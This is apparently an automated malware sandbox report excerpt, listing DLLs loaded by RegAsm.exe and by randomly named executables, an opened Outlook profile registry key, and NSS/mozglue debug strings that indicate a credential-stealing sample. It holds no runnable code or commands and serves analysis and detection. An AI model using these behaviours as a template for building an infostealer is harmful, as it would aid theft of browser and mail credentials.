Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\userGIEGHJEGHJ.exe	Section loaded: mscoree.dll
Source: C:\Users\userGIEGHJEGHJ.exe	Section loaded: apphelp.dll
Source: C:\Users\userGIEGHJEGHJ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\userGIEGHJEGHJ.exe	Section loaded: version.dll
Source: C:\Users\userGIEGHJEGHJ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\userGIEGHJEGHJ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Users\userIJEGDBGDBF.exe	Section loaded: mscoree.dll
Source: C:\Users\userIJEGDBGDBF.exe	Section loaded: apphelp.dll
Source: C:\Users\userIJEGDBGDBF.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\userIJEGDBGDBF.exe	Section loaded: version.dll
Source: C:\Users\userIJEGDBGDBF.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\userIJEGDBGDBF.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2662400593.000000006C58D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3067781475.000000006C7C5000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2649143006.0000000038576000.00000004.00000020.00020000.00000000.sdmp
